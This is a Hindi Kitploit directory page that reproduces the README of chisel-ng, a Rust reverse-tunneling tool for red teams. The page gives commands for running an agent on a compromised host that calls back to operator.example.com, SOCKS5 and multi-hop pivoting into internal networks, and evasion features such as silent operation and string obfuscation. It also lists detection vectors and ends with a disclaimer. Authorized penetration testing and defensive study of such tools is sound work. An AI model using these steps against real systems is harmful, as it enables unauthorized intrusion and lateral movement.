Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
chisel-ng — Chisel की नई पीढ़ी, रस्ट में लिखा गया। कुछ अनुकूलन के साथ WSS के तहत SSH। | Kitploit
उपकरण/GitHubGitHub/nullsection/chisel-ng
आईडीएस/आईपीएस से बचनापार्श्व आंदोलनपोस्ट-शोषणनेटवर्क सुरक्षापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलरेड टीमिंगरिमोट एक्सेस टूल
GitHubnullsection/chisel-ng

chisel-ng

Chisel की नई पीढ़ी, रस्ट में लिखा गया। कुछ अनुकूलन के साथ WSS के तहत SSH।

रिपॉजिटरी देखें
136967 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

| | ()___ | | _ __ __ _ / | ' | / |/ _ \ || ' \ / ` | | (__| | | | _ \ / || | | | (| | _|| |||/_|| || ||_, | |___/

chisel-ng

Rust License Windows Linux

पेनिट्रेशन टेस्टिंग और रेड टीम ऑपरेशन के लिए chisel का एक Rust कार्यान्वयन। SSH-over-WebSocket-over-TLS पर रिवर्स टनल स्थापित करता है, जिससे ऑपरेटर समझौता किए गए होस्ट के माध्यम से पिवट कर सकते हैं, सामान्य HTTPS ट्रैफ़िक के साथ घुलमिल जाते हैं।


विषय-सूची

  • त्वरित आरंभ
  • विशेषताएँ
  • आर्किटेक्चर
  • उपयोग संदर्भ
    • सर्वर (ऑपरेटर)
    • रिवर्स क्लाइंट (एजेंट)
    • बाइंड क्लाइंट (एजेंट - इनबाउंड मोड)
  • CLI कमांड्स
  • मल्टी-हॉप पिवटिंग
  • तकनीकी विवरण
  • OPSEC विचार
  • अस्वीकरण

  • त्वरित आरंभ

    आवश्यकताएँ

    • Rust 1.70+ (rustup.rs)

    बिल्ड

    root@kitploit:~
    git clone https://github.com/nullsection/chisel-ng
    cd chisel-ng
    cargo build --release
    

    बाइनरी target/release/ में आउटपुट होती हैं: chisel-server, chisel-client, chisel-bind-client

    मूल उपयोग

    1. सर्वर शुरू करें (ऑपरेटर):

    root@kitploit:~
    ./chisel-server -p 'secret' -v
    

    2. क्लाइंट चलाएँ (लक्ष्य):

    root@kitploit:~
    ./chisel-client -s operator.example.com:8443 -p 'secret' -k
    

    3. टनल बनाएँ:

    root@kitploit:~
    chisel-ng> session 1
    [session-1] TARGET > tunnel 8080:192.168.1.100:80
    [session-1] TARGET > socks5 1080
    

    4. आंतरिक सेवाओं तक पहुँचें:

    root@kitploit:~
    curl http://127.0.0.1:8080
    curl --socks5 127.0.0.1:1080 http://internal.corp/
    

    विशेषताएँ

    • SSH over WebSocket over TLS - सामान्य HTTPS ट्रैफ़िक के साथ घुलमिल जाता है
    • प्री-शेयर्ड कुंजी प्रमाणीकरण - सरल, सुरक्षित प्रमाणीकरण
    • डायनामिक पोर्ट फ़ॉर्वर्डिंग - ऑन-डिमांड टनल बनाएँ
    • SOCKS5 प्रॉक्सी - एजेंट के माध्यम से डायनामिक रूटिंग
    • दो क्लाइंट मोड - रिवर्स (बाहर कनेक्ट करता है) और बाइंड (इनबाउंड स्वीकार करता है)
    • क्रॉस-प्लेटफ़ॉर्म - विंडोज़ और लिनक्स

    आर्किटेक्चर

    root@kitploit:~
    +------------------+              +----------------------------------+
    |     ऑपरेटर      |              |         लक्ष्य नेटवर्क           |
    |                  |              |                                  |
    | +--------------+ |     SSH      | +--------------+                 |
    | |chisel-server |<---------------+-|chisel-client |                 |
    | |    :8443     | |   (TLS पर)   | |  (रिवर्स)    |                 |
    | +--------------+ |              | +--------------+                 |
    +------------------+              +----------------------------------+
    

    प्रोटोकॉल स्टैक:

    root@kitploit:~
    TCP -> TLS 1.3 -> WebSocket -> SSH -> टनल डेटा
                         ^
                HTTPS के रूप में दिखाई देता है
    

    क्लाइंट मोड:

    • रिवर्स (chisel-client) - सर्वर से आउटबाउंड कनेक्ट करता है
    • बाइंड (chisel-bind-client) - इनबाउंड के लिए सुनता है; सर्वर connect कमांड का उपयोग करता है

    उपयोग संदर्भ

    सर्वर (ऑपरेटर)
    root@kitploit:~
    विकल्प:
        -l, --listen <पता>       सुनने का पता [डिफ़ॉल्ट: 0.0.0.0:8443]
        -p, --psk <PSK>          प्री-शेयर्ड कुंजी या पासफ़्रेज़ [env: CHISEL_PSK]
            --cert <फ़ाइल>       TLS प्रमाणपत्र (PEM)
            --key <फ़ाइल>        TLS निजी कुंजी (PEM)
            --generate-psk       रैंडम PSK उत्पन्न करें और बाहर निकलें
        -v, --verbose            विस्तृत आउटपुट
    
    रिवर्स क्लाइंट (एजेंट)
    root@kitploit:~
    विकल्प:
        -s, --server <पता>       सर्वर पता (होस्ट:पोर्ट)
        -p, --psk <PSK>          प्री-शेयर्ड कुंजी या पासफ़्रेज़ [env: CHISEL_PSK]
        -u, --user <लेबल>        सत्र लेबल [डिफ़ॉल्ट: agent]
        -k, --insecure           TLS सत्यापन छोड़ें
            --no-reconnect       ऑटो-रीकनेक्ट अक्षम करें
        -i, --interval <सेकंड>  पुनः कनेक्ट अंतराल [डिफ़ॉल्ट: 30]
            --heartbeat <सेकंड>  हार्टबीट अंतराल [डिफ़ॉल्ट: 30]
        -v, --verbose            विस्तृत आउटपुट
    
    बाइंड क्लाइंट (एजेंट - इनबाउंड मोड)

    उन लक्ष्यों के लिए जो इनबाउंड स्वीकार कर सकते हैं लेकिन आउटबाउंड शुरू नहीं कर सकते:

    root@kitploit:~
    विकल्प:
        -l, --listen <पता>       सुनने का पता (जैसे, 0.0.0.0:9000)
        -p, --psk <PSK>          प्री-शेयर्ड कुंजी या पासफ़्रेज़ [env: CHISEL_PSK]
        -u, --user <लेबल>        सत्र लेबल [डिफ़ॉल्ट: agent]
        -k, --insecure           TLS सत्यापन छोड़ें
            --heartbeat <सेकंड>  हार्टबीट अंतराल [डिफ़ॉल्ट: 30]
        -v, --verbose            विस्तृत आउटपुट
    
    सर्वर CLI कमांड्स

    मुख्य मेनू:

    root@kitploit:~
    sessions             कनेक्टेड सत्रों की सूची
    session <id>         एक सत्र चुनें
    connect <ip:port>    बाइंड क्लाइंट से कनेक्ट करें
    disconnect <id>      सत्र डिस्कनेक्ट करें (पुनः कनेक्ट होगा)
    kill <id>            क्लाइंट प्रक्रिया समाप्त करें
    

    सत्र मेनू:

    root@kitploit:~
    tunnel <local>:<target_ip>:<target_port>    टनल बनाएँ
    tunnel --local <local>:<target>:<port>      टनल बनाएँ (केवल लोकलहोस्ट)
    tunnel stop <port>                          टनल रोकें
    tunnels                                     टनल की सूची
    socks5 <port>                               SOCKS5 प्रॉक्सी शुरू करें
    socks5 stop <port>                          SOCKS5 प्रॉक्सी रोकें
    ping                                        विलंबता मापें
    ps                                          दूरस्थ प्रक्रियाओं की सूची
    netstat                                     दूरस्थ कनेक्शनों की सूची
    

    मल्टी-हॉप पिवटिंग

    मौजूदा सत्रों के माध्यम से चेनिंग करके पृथक नेटवर्क तक पहुँचें।

    परिदृश्य: DMZ होस्ट ऑपरेटर तक पहुँच सकता है। आंतरिक होस्ट (10.0.0.50) केवल DMZ से पहुँचा जा सकता है।

    root@kitploit:~
    +----------+        +-----------+        +------------+
    | ऑपरेटर  |--SSH---| सत्र 1    |--TCP---| सत्र 2     |
    |  सर्वर   |        |   (DMZ)   |        | (आंतरिक)   |
    +----------+        +-----------+        +------------+
    

    चरण 1 - सर्वर शुरू करें (ऑपरेटर):

    root@kitploit:~
    ./chisel-server -p 'secret' -v
    

    चरण 2 - रिवर्स क्लाइंट चलाएँ (DMZ होस्ट):

    root@kitploit:~
    ./chisel-client -s operator.example.com:8443 -p 'secret' -k
    

    चरण 3 - बाइंड क्लाइंट चलाएँ (आंतरिक होस्ट 10.0.0.50 पर):

    root@kitploit:~
    ./chisel-bind-client -l 0.0.0.0:9000 -p 'secret' -k
    

    चरण 4 - टनल बनाएँ और कनेक्ट करें (सर्वर CLI):

    root@kitploit:~
    chisel-ng> session 1
    [session-1] DMZ > tunnel --local 9000:10.0.0.50:9000
    Tunnel started on 127.0.0.1:9000
    
    [session-1] DMZ > back
    chisel-ng> connect 127.0.0.1:9000
    Session 2 registered
    
    chisel-ng> session 2
    [session-2] INTERNAL > socks5 1080
    

    तकनीकी विवरण

    टनल कैसे काम करते हैं

    जब टनल बनाई जाती है (tunnel 8080:192.168.1.100:80):

    1. सर्वर लोकल पोर्ट 8080 बांधता है
    2. कनेक्शन पर, सर्वर एजेंट को CONNECT अनुरोध भेजता है
    3. एजेंट लक्ष्य से जुड़ता है और SSH direct-tcpip चैनल खोलता है
    4. डेटा दोनों दिशाओं में पुल करता है
    SOCKS5 कैसे काम करता है

    RFC 1928 हैंडशेक के माध्यम से डायनामिक गंतव्य। सटीक पोर्ट स्कैनिंग परिणामों के लिए उपयुक्त त्रुटि कोड लौटाता है।


    OPSEC विचार

    बाइनरी सख्ती

    रिलीज़ बिल्ड सख्त किए गए हैं:

    • मूक संचालन - सभी लॉगिंग no-ops में संकलित होती है
    • स्ट्रिंग अस्पष्टीकरण - प्रोटोकॉल स्ट्रिंग्स संकलन समय पर XOR-एन्क्रिप्टेड होती हैं
    • प्रतीक हटाना - कोई डीबग प्रतीक या स्रोत पथ नहीं
    • आकार अनुकूलन - ~3 MB बनाम ~15 MB डीबग
    • पैनिक व्यवहार - तत्काल समाप्ति, कोई स्टैक ट्रेस नहीं
    परिचालन सुरक्षा
    • PSK प्रमाणीकरण - पासफ़्रेज़ (SHA-256) या कच्चे हेक्स से 256-बिट कुंजी
    • कोई क्रेडेंशियल भंडारण नहीं - केवल तर्क या पर्यावरण चर के माध्यम से PSK
    • ऑटो-रीकनेक्ट - डिफ़ॉल्ट रूप से सक्षम, कॉन्फ़िगरेबल अंतराल
    • हार्टबीट - कॉन्फ़िगरेबल कीपअलाइव, --heartbeat 0 से अक्षम करें
    पहचान वेक्टर
    • JA3/JA4 TLS फ़िंगरप्रिंटिंग
    • WebSocket अपग्रेड पैटर्न
    • लंबे समय तक चलने वाले कनेक्शन की अवधि
    • सुसंगत हार्टबीट अंतराल

    अस्वीकरण

    यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है। उपयोग से पहले उचित प्राधिकरण प्राप्त करें। लेखक दुरुपयोग के लिए जिम्मेदार नहीं हैं।


    लाइसेंस

    MIT

    टूल डाउनलोड करें